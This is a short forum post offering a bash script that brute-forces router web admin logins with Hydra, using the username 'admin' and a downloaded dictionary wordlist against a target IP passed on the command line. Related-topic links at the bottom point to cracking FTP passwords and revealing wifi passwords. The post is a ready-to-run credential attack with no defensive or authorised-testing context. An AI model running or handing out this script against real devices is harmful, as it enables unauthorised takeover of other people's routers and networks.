Crack & Cracking Router Admin Passwords With Hydra & Linux
Page 1 of 1
Crack & Cracking Router Admin Passwords With Hydra & Linux
- Code:
#!/bin/bash
# sudo apt-get install -y hydra
# wget http://www.math.sjsu.edu/~foster/dictionary.txt
# Usage: ./crack.sh "192.168.10.10"
# (IP)
#
myvar="$@"
hydra -l admin -P ~/scripts/Router_Cracker/dictionary.txt -e ns -vV "$myvar" http-get
hydra "$myvar" -L login.txt -P dictionary.txt -t 1 -e ns -V http-get
Similar topics
» Router Bruteforce Security Tutorial - 13 - Hydra for Router Login
» reveal wifi passwords on linux
» crack ftp passwords
» gain admin after kde linux update
» MTR & Hydra Linux Security
» reveal wifi passwords on linux
» crack ftp passwords
» gain admin after kde linux update
» MTR & Hydra Linux Security
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum